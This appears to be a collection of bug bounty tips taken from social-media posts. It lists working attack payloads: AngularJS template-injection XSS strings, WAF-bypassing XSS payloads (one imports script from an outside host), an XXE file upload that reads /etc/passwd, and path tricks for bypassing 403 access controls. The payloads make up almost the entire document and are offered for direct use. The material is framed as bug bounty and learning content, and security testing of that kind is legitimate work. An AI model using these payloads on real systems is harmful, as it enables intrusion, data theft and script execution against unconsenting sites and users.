Simple XSS payload for AngularJS testing.
Older AngularJS versions are still vulnerable to expression injection.
{{$on.constructor('alert(document.domain)')()}}
#BugBounty#XSS#bugbountytips#hackerone
Cloudflare WAF Bypass โ XSS๐ก
The vulnerability occurred because the URL was being printed directly in JavaScript. Used this payload to achieve reflected XSS:
--'<00 foo="<a%20href="javascriptโ:prompt(404)">XSS-Click</00>--%20//
#BugBounty#infosec#bugbountytips
Bug Bounty Tip : XML External Entity(XXE)
1.Go to the file upload functionality in the application.
2.Upload a XML file
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<test>&xxe;</test>
3.Use Burp Suite to intercept the request and modify content type.
[+] 403 bypass methodology !
1- using space symbols
exmaple:
/admin -> 403
/admin%09 -> 200
/admin%20 -> 200
2- use traversal
Example:
/admin -> 403
/..;/admin -> 200
you can fuzz with traversal sometimes that's end with results
Example: /..;/FUZZ
#bugbountytips
We just found a variation of our current
CloudFlare #XSS#Bypass!
OnXSS=<Img/Src/OnError=alert(1)>
It's better than our previous <Img Src=OnXSS OnError=alert(1)> because it works where no spaces are allowed.
Soon on KNOXSS. โจ
An AngularJS Client-Side Template Injection by @0x0SojalSec, inspired by @garethheyes
{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
One #XSS Payload to Rule Them All
#Bypass Akamai, Imperva and CloudFlare #WAF
<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>
#hack2learn@KN0X55